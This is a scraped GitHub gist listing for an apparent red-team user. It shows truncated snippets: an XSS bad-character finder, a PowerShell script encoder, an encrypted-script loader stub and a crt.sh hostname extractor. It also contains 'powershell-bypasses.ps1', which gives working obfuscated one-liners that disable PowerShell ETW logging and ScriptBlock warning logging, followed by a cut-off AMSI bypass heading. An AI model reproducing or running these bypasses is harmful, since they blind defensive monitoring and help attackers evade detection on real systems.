reigningshells

@reigningshells
reigningshells / badchars.py
Created May 24, 2019
Simple script to identify an XSS filter's "bad characters"
View badchars.py
#!/usr/bin/env python
"""
Very simple script to automate the discovery of
bad characters in XSS filters that replace
the entire user input string with an empty string
[CR] = Carriage Return or \r
[LF] = Line Feed or \n
@reigningshells
reigningshells / script-encoder.ps1
Last active Jan 30, 2020
Just some script encoding musings
View script-encoder.ps1
Function Encode-Script
{
Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$Data,
[Parameter(Position = 1, Mandatory = $True)]
[String]
$Key
View cryptedkerb.ps1
function Expand-Script($Key)
{
$script = '
@reigningshells
reigningshells / cert-transparency-extractor.py
Last active Jul 20, 2020
Simple script to extract hostnames from cert transparency logs at crt.sh
View cert-transparency-extractor.py
#!/usr/bin/env python3
import sys
import argparse
import requests
from lxml import html
import urllib3
# Nobody wants to see SSL warnings :-P
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
@reigningshells
reigningshells / powershell-bypasses.ps1
Last active Aug 18, 2020
Random PowerShell Bypasses
View powershell-bypasses.ps1
# Best logging bypass:
(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid)))
# ScriptBlock Warning Event Logging Bypass:
[ScriptBlock]."GetFiel`d"('signatures','N'+'onPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]))
# AMSI Bypass (old, burned)